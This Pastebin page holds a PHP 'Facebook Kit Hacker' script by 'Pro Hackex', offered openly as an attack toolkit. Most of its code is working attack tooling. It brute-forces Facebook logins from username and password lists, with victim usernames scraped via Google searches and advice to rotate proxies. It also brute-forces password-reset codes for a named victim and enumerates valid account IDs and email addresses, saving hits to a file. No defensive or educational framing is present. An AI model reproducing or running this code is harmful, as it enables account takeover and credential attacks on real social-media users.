Pro-Hackex

Facebook Tools 2016

Dec 24th, 2015
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.08 KB | None | 0 0
  1. #################################################
  2. #---------------------------------------------- #
  3. ‪#‎Facebook‬ Tools Script #
  4. ‪#‎Coded‬ by : Pro Hackex
  5. # --------------------------------------------- #
  6. ################################################
  7.  
  8. echo '
  9. <html>
  10. <title>Facebook Kit Hacker V 1.2</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
  11. <body style="background-color:black;">
  12. <style type="text/css">
  13. body {
  14. background:
  15. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  16. url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
  17. background-color: #000000;
  18. }
  19. a{
  20. text-decoration:none;
  21. border:1px solid #12549c;
  22. border-radius:5px;
  23. background-color:black;
  24. color:white;
  25. font-family:Arial;
  26. font-size:17;
  27. box-shadow: 0px 0px 12px #21a0ed;
  28. }
  29. #r{
  30. border-bottom:1px solid #12549c;
  31. }
  32. </style>
  33.  
  34. <head>
  35. </body>
  36. </html>
  37. <center><font color="white" face="impact" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
  38. ';
  39.  
  40. echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly93d3cucGF0cmlvdHNwb2ludC5vcmcvbmV3c19ldmVudHMvd3AtY29udGVudC9wbHVnaW5zL3RyYWNrYWJsZS1zb2NpYWwtc2hhcmUtaWNvbnMvYnV0dG9ucy9mMi8vZmFjZWJvb2sucG5nIi8+").'</center>';
  41.  
  42. echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
  43.  
  44. echo '</font></b></div><br></center>';
  45.  
  46. ?>
  47. <div id="det" align="center">
  48.  
  49. </div>
  50. </center>
  51. <div id="r" align="center">
  52.  
  53. <audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
  54. </div><br>
  55. <?php
  56. if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
  57. @error_reporting(0);
  58. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it
  59. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words
  60. $validCharNumber = strlen($validCharacters);
  61. $len = 10;
  62. $result = "";
  63.  
  64. for ($i = 0; $i < $len; $i++) {
  65. $index = mt_rand(0, $validCharNumber - 1);
  66. $result .= $validCharacters[$index];
  67. }
  68.  
  69. return $result;
  70. }
  71. echo'
  72. <style>
  73. textarea {
  74. resize:none;
  75. color: #1975FF ;
  76. border:1px solid #1975FF ;
  77. border-left: 4px solid #1975FF ;
  78. }
  79. input {
  80. color: ##33CCFF;
  81. border:1px dotted #33CCFF;
  82. }
  83. </style>
  84. <p><center><font face="impact" color="White" size="4">Facebook ID Generator
  85. </center><center></font><br>
  86. <title>Facebook ID Generator</title>
  87. <form method="post">
  88. <font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
  89. <input type="submit" value="Generate" name="fbmailgen">
  90. </form><br>';
  91.  
  92. $len = $_POST['len'];
  93. $nr = $_POST['nr'];
  94. if ($_POST['fbmailgen']) {
  95. echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
  96. for ($x=0; $x < $nr ; $x++){
  97. echo "10000" . getRandomString() . "\r\n";
  98. }
  99. echo "</textarea><br>";
  100. echo "
  101. <br>
  102. <b>
  103. </b>
  104. <br>
  105. ";
  106. }
  107. }
  108. if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
  109. @error_reporting(0);
  110. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it
  111. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words
  112. $validCharNumber = strlen($validCharacters);
  113. $len = 6;
  114. $result = "";
  115.  
  116. for ($i = 0; $i < $len; $i++) {
  117. $index = mt_rand(0, $validCharNumber - 1);
  118. $result .= $validCharacters[$index];
  119. }
  120.  
  121. return $result;
  122. }
  123. echo'
  124. <style>
  125. textarea {
  126. resize:none;
  127. color: #1975FF ;
  128. border:1px solid #1975FF ;
  129. border-left: 4px solid #1975FF ;
  130. }
  131. input {
  132. color: ##33CCFF;
  133. border:1px dotted #33CCFF;
  134. }
  135. </style>
  136. <p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
  137. </center><center><br>
  138. <title>Facebook Reset Code Generator</title>
  139. <form method="post">
  140. <font color="white">Number Of Reset Codes : &nbsp;&nbsp;<input type="text" name="nr"><br><br></font>
  141. <input type="submit" value="Generate" name="fbmailgen">
  142. </form><br>';
  143. $len = $_POST['len'];
  144. $nr = $_POST['nr'];
  145. if ($_POST['fbmailgen']) {
  146. echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
  147. for ($x=0; $x < $nr ; $x++){
  148. echo getRandomString() . "\r\n";
  149. }
  150. echo "</textarea><br>";
  151. echo "
  152. <br>
  153. <b>
  154. </b>
  155. <br>
  156. ";
  157. }}
  158. if(isset($_GET['action']) && $_GET['action'] == 'brut'){
  159. echo"
  160. <style>
  161. textarea {
  162. resize:none;
  163. color: #1975FF ;
  164. border:1px solid #1975FF ;
  165. border-left: 4px solid #1975FF ;
  166. }
  167. input {
  168. color: ##33CCFF;
  169. border:1px dotted #33CCFF;
  170. }
  171. select {
  172. color: ##33CCFF;
  173. border:1px dotted #33CCFF;
  174. }
  175. </style>
  176. <title>F4c3b00k Gh0sT</title>
  177. <form method='POST'>
  178. <center><font face='impact' size='4' color='white'>Facebook GhosT Catcher by Pro Hackex</font><br></center><br>
  179. <center>
  180. <center><font face='arial' size='1' color='red'>Server</font><br></center>
  181. <select name=country><br><br>
  182. <option value='Choose Country'>Choose The Country</option>
  183. <option value='site:fr-fr.facebook.com/'>France</option>
  184. <option value='site:ar-ar.facebook.com/'>Arab Countries</option>
  185. <option value='site:es-es.facebook.com/'>Spain</option>
  186. <option value='site:tr-tr.facebook.com/'>Turkey</option>
  187. <option value='site:de-de.facebook.com/'>Germany</option>
  188. <option value='site:pt-pt.facebook.com/'>Portugual</option>
  189. <option value='site:it-it.facebook.com/'>Italy</option>
  190. <option value='site:hi-in.facebook.com/'>India</option>
  191. <option value='site:sr-rs.facebook.com/'>Serbia</option>
  192. <option value='site:el-gr.facebook.com/'>Greece</option>
  193. <option value='site:he-il.facebook.com/'>Israel</option>
  194. <option value='site:id-id.facebook.com/'>Indonesia</option>
  195. <option value='site:ru-ru.facebook.com/'>Russia</option>
  196. <option value='site:nl-nl.facebook.com/'>Netherlands</option>
  197. <option value='site:bg-bg.facebook.com/'>Bulgaria</option>
  198. <option value='site:mk-mk.facebook.com/'>Macedonia</option>
  199. <option value='site:uk-ua.facebook.com/'>Ukraine</option>
  200. <option value='site:zh-cn.facebook.com/'>China</option>
  201. </select><br><br>
  202. </center>
  203. <center>
  204. <input type='text' name='victim' placeholder='Victim Name'><br><br>
  205. <textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
  206. <input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
  207. </form>
  208. <center>
  209. <font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
  210. ";
  211. set_time_limit(0);
  212. ini_set('memory_limit', '64M');
  213. header('Content-Type: text/html; charset=UTF-8');
  214. function letItBy(){ ob_flush(); flush(); }
  215.  
  216. $country = $_POST['country'];
  217. $victim = $_POST['victim'];
  218. $bing = "{$country}"."{$victim}";
  219. $password = explode("\r\n",htmlentities($_POST['pass']));
  220. //Function that gets google urls
  221. function google_that($query, $page=1)
  222. {
  223. $resultPerPage=8;
  224. $start = $page*$resultPerPage;
  225. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  226. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  227. if(isset($resultFromGoogle['responseStatus'])) {
  228. if($resultFromGoogle['responseStatus'] != '200') return false;
  229. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  230. else return $resultFromGoogle['responseData']['results'];
  231. }
  232. else
  233. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  234. }
  235. function http_get($url, $safemode = false){
  236. if($safemode === true) sleep(1);
  237. $im = curl_init($url);
  238. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  239. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  240. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  241. curl_setopt($im, CURLOPT_HEADER, 0);
  242. return curl_exec($im);
  243. curl_close();
  244. }
  245. function brute($user,$pass){
  246. $ch = curl_init();
  247. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  248. curl_setopt($ch, CURLOPT_HEADER, 0);
  249. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  250. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  251. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  252. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  253. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  254. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  255. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  256. $login = curl_exec($ch);
  257. //print_r($login);
  258. $check = (eregi('class="s t i u"',$login)) ? true:false;
  259. if($check == true){
  260. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  261. }else{
  262. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  263. }
  264. }
  265.  
  266.  
  267. if(isset($_POST['start'])){
  268.  
  269. letItBy();
  270. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  271. $googleResult = google_that($bing, $googlePage);
  272. if(!$googleResult) {
  273. echo 'Finished scanning.';
  274.  
  275. break;
  276. }
  277.  
  278. // Gets the username of victim
  279.  
  280. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  281.  
  282. $result = $googleResult[$victim]['unescapedUrl'];
  283. if($country == "site:fr-fr.facebook.com/"){
  284. $rsss = str_replace("https://fr-fr.facebook.com/","",$result);
  285. }
  286. elseif($country == "site:ar-ar.facebook.com/"){
  287. $rsss = str_replace("https://ar-ar.facebook.com/","",$result);
  288. }
  289. elseif($country == "site:es-es.facebook.com/"){
  290. $rsss = str_replace("https://es-es.facebook.com/","",$result);
  291. }
  292. elseif($country == "site:tr-tr.facebook.com/"){
  293. $rsss = str_replace("https://tr-tr.facebook.com/","",$result);
  294. }
  295. elseif($country == "site:de-de.facebook.com/"){
  296. $rsss = str_replace("https://de-de.facebook.com/","",$result);
  297. }
  298. elseif($country == "site:pt-pt.facebook.com/"){
  299. $rsss = str_replace("https://pt-pt.facebook.com/","",$result);
  300. }
  301. elseif($country == "site:it-it.facebook.com/"){
  302. $rsss = str_replace("https://it-it.facebook.com/","",$result);
  303. }
  304. elseif($country == "site:hi-in.facebook.com/"){
  305. $rsss = str_replace("https://hi-in.facebook.com/","",$result);
  306. }
  307. elseif($country == "site:zh-cn.facebook.com/"){
  308. $rsss = str_replace("https://zh-cn.facebook.com/","",$result);
  309. }
  310. elseif($country == "site:sr-rs.facebook.com/"){
  311. $rsss = str_replace("https://sr-rs.facebook.com/","",$result);
  312. }
  313. elseif($country == "site:el-gr.facebook.com/"){
  314. $rsss = str_replace("https://el-gr.facebook.com/","",$result);
  315. }
  316. elseif($country == "site:he-il.facebook.com/"){
  317. $rsss = str_replace("https://he-il.facebook.com/","",$result);
  318. }
  319. elseif($country == "site:id-id.facebook.com/"){
  320. $rsss = str_replace("https://id-id.facebook.com/","",$result);
  321. }
  322. elseif($country == "site:ru-ru.facebook.com/"){
  323. $rsss = str_replace("https://ru-ru.facebook.com/","",$result);
  324. }
  325. elseif($country == "site:nl-nl.facebook.com/"){
  326. $rsss = str_replace("https://nl-nl.facebook.com/","",$result);
  327. }
  328. elseif($country == "site:bg-bg.facebook.com/"){
  329. $rsss = str_replace("https://bg-bg.facebook.com/","",$result);
  330. }
  331. elseif($country == "site:mk-mk.facebook.com/"){
  332. $rsss = str_replace("https://mk-mk.facebook.com/","",$result);
  333. }
  334. elseif($country == "site:uk-ua.facebook.com/"){
  335. $rsss = str_replace("https://uk-ua.facebook.com/","",$result);
  336. }
  337. $users = explode("?", $rsss);
  338. $users = $users[0];
  339.  
  340. //Bruteforce Function
  341.  
  342. foreach($password as $pass)
  343. {
  344.  
  345. echo brute($users,$pass);
  346. }}}}
  347.  
  348.  
  349. if(stristr(php_uname(),"Windows"))
  350. {system("del cookie.txt");}
  351. elseif(stristr(php_uname(),"Linux"))
  352. {system("rm cookie.txt");}}
  353. #
  354. if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
  355. ob_start();
  356. @set_time_limit(0);
  357. echo "
  358. <head>
  359. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  360. <form method='POST'>
  361. <title>Facebook Brute Force 2016</title>
  362. </head>
  363. <style>
  364. textarea {
  365. resize:none;
  366. color: #1975FF ;
  367. border:1px solid #1975FF ;
  368. border-left: 4px solid #1975FF ;
  369. }
  370. input {
  371. color: ##33CCFF;
  372. border:1px dotted #33CCFF;
  373. }
  374. </style>";
  375.  
  376. echo "
  377. <body text='#FFFFFF' >
  378. <center><font color='White' size=4 face='impact' >Facebook Ids BruteForce by Pro Hackex </center></font><br>
  379. <p dir='ltr' align='center'>
  380. <textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
  381. <textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
  382. <br>
  383. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
  384. if(isset($_POST['scan'])){
  385. #To Put Proxy SOCKS V5
  386. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  387. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  388. function brute($user,$pass){
  389. $ch = curl_init();
  390. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  391. curl_setopt($ch, CURLOPT_HEADER, 0);
  392. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  393. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  394. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  395. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  396. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  397. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  398. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  399. $login = curl_exec($ch);
  400. //print_r($login);
  401. $check = (eregi('class="s t i u"',$login)) ? true:false;
  402. if($check == true){
  403. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  404. }else{
  405. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  406. }
  407. }
  408.  
  409.  
  410.  
  411.  
  412. $username = explode("\n", htmlentities($_POST['username']));
  413. $password = explode("\n", htmlentities($_POST['password']));
  414.  
  415.  
  416. foreach($username as $users) {
  417. $users = @trim($users);
  418. foreach($password as $pass) {
  419. $pass = @trim($pass);
  420. echo brute($users,$pass);
  421. }
  422.  
  423. }
  424.  
  425.  
  426.  
  427. if(stristr(php_uname(),"Windows"))
  428. {system("del cookie.txt");}
  429. elseif(stristr(php_uname(),"Linux"))
  430. {system("rm cookie.txt");}}
  431. #
  432. }
  433.  
  434. if(isset($_GET['action']) && $_GET['action'] == 'crack'){
  435.  
  436. @set_time_limit(0);
  437. echo "<form method='POST'>
  438. <title>Facebook Code Security Cracker > By Pro Hackex </title>
  439. <style>
  440. /* Rounded Corners */
  441. #ghost {
  442. resize:none;
  443. color: #1975FF ;
  444. border:1px solid #1975FF ;
  445. border-left: 4px solid #1975FF ;
  446. height: 250px;
  447. width: 200px; }
  448. input {
  449. /* INPUTS */
  450. border: 1px solid #12549c;
  451. }
  452. </style>
  453. <center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Pro Hackex</center><br>
  454. <center><input type='text' name='target' placeholder='Victim'></center><br>
  455. <center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
  456. <p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
  457. </form>";
  458. $target=$_POST['target'];
  459. $user = explode("\r\n", htmlentities($_POST['code']));
  460. if($_POST['scan'])
  461. {
  462. foreach($user as $code)
  463. {
  464. // Curl Function ^_^
  465. $ch = curl_init();
  466. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
  467. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  468. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  469. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  470. curl_setopt($ch, CURLOPT_HEADER, 1);
  471. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  472. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  473. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  474.  
  475. $check = curl_exec($ch);
  476. if(eregi("password_new", $check)) //Keyword Good Response ^_^
  477. {
  478. echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found </font><br>";
  479. }
  480. else
  481. {
  482. echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
  483. }
  484. curl_close($ch);
  485. }
  486. }
  487. #Added By AnonGuy From Madleets
  488. if(stristr(php_uname(),"Windows"))
  489. {system("del cookie.txt");}
  490. elseif(stristr(php_uname(),"Linux"))
  491. {system("rm cookie.txt");}
  492. #
  493.  
  494. }
  495. ob_end_flush();
  496.  
  497. echo '<center><font color="red" face="arial" size="2" align="">Coded By Pro Hackex</font></center>';
  498.  
  499. if(isset($_GET['action']) && $_GET['action'] == 'graph'){
  500.  
  501.  
  502.  
  503. @set_time_limit(0);
  504. echo "<form method='POST'>
  505. <title>Facebook ID's Checker By Pro Hackex</title>
  506. <style>
  507. /* Rounded Corners */
  508. #ghost {
  509. resize:none;
  510. color: #1975FF ;
  511. border:1px solid #1975FF ;
  512. border-left: 4px solid #1975FF ;
  513. height: 250px;
  514. width: 200px; }
  515. input {
  516. /* INPUTS */
  517. border: 1px solid #12549c;
  518. }
  519. </style>
  520. <center><font color='White' size='4' face='impact'>Facebook ID's Checker By Pro Hackex</center><br>
  521. <center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
  522. <p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
  523. </form>";
  524.  
  525. $user = explode("\r\n", htmlentities($_POST['code']));
  526. if($_POST['scan'])
  527. {
  528. foreach($user as $code)
  529. {
  530. // Curl Function ^_^
  531. $ch = curl_init();
  532. curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
  533. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  534. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  535. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  536. curl_setopt($ch, CURLOPT_HEADER, 1);
  537. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  538. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  539. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  540.  
  541. $check = curl_exec($ch);
  542. if(eregi("username", $check)) //Keyword Good Response ^_^
  543. {
  544. echo "<center><font face='Tahoma' size='2' color='green'><a href='http://graph.facebook.com/{$code}' target='_blank'>$code => ID IS CORRECT ^_^</a> </font><br></center>";
  545. }
  546. else
  547. {
  548. echo "<center><font face='Tahoma' size='2' color='red'><a href='http://graph.facebook.com/{$code}' target='_blank'>$code => ID IS FALSE :(</a></font><br></center>";
  549. }
  550. curl_close($ch);
  551. }
  552. }
  553. #
  554. if(stristr(php_uname(),"Windows"))
  555. {system("del cookie.txt");}
  556. else if(stristr(php_uname(),"Linux"))
  557. {system("rm cookie.txt");}}
  558. #
  559. echo "</center><center>";
  560.  
  561.  
  562. if(isset($_GET['action']) && $_GET['action'] == 'emailchk'){
  563. ob_start();
  564. @set_time_limit(0);
  565. error_reporting(E_ERROR | E_PARSE);
  566. echo "
  567. <body bgcolor='black'>
  568. <head>
  569. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  570. <form method='POST'>
  571. <title>Facebook Email Checker</title>
  572. </head>";
  573. echo "
  574. <style>
  575. #s{
  576. margin-bottom:15px;}
  577. textarea{
  578. resize:none;
  579. background-color:black;
  580. color:#26a1ff;
  581. border:1px solid #0088ec;
  582. border-radius:10px;
  583. box-shadow:0px 0px 10px #26a1ff;
  584. }
  585. input{
  586. color:#0088ec;
  587. background-color:black;
  588. border:1px solid #0088ec;
  589. }
  590. </style>
  591. <center><b><br><br><font face='impact' size='5' color='red'><img width='85' height='85' src='http://i.imgur.com/Bpshup3.png'><img id='s' src='http://i.imgur.com/6e41km8.jpg'><br></font></b></center>
  592. <p dir='ltr' align='center'>
  593. <center><textarea cols='39' rows='12' id='ghost' name='email' >mauritania-attacker@hotmail.com
  594. nonamehaxor@hotmail.com
  595. lolololof@lol.com</textarea><br></center><br>
  596. <center><input type='submit' name='scan' value='Start checking'><br><br>
  597. <input type='checkbox' name='save' value='Save Working Facebook Emails to fbemails.txt file'><font color='#0088ec'>Save Working Facebook Emails to fbemails.txt file</font><br></p></center>";
  598. $emailz = explode("\r\n", htmlentities($_POST['email']));
  599. if($_POST['scan'])
  600. {
  601. foreach($emailz as $email)
  602. {
  603. // Curl Function ^_^
  604. $ch = curl_init();
  605. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login/identify/?ctx=recover");
  606. curl_setopt($ch, CURLOPT_HEADER, 1);
  607. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  608. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  609. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  610. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$email}");
  611. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  612. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  613.  
  614. $check = curl_exec($ch);
  615. if(eregi("recover_method", $check)) //Keyword Good Response \!/
  616. {
  617. echo "<center><font face='Tahoma' size='2' color='green'>$email => Facebook User Email Found </a> </font><br></center>";
  618. if(isset($_POST['save'])){
  619. $handle= fopen ("fbemails.txt",a);
  620. fwrite($handle,$email . "\r\n");
  621. fclose();
  622. }
  623. }
  624. else
  625. {
  626. echo "<center><font face='Tahoma' size='2' color='red'>$email => Not a Facebook Email </a></font><br></center>";
  627. }
  628. curl_close($ch);
  629. }
  630. }
  631.  
  632. # Delete Cookies wkwkwkwkw \!/
  633. if(stristr(php_uname(),"Windows"))
  634. {system("del cookie.txt");}
  635. else if(stristr(php_uname(),"Linux"))
  636. {system("rm cookie.txt");}}
  637. #
  638. ob_end_flush();
  639. ?>
Add Comment
Please, Sign In to add comment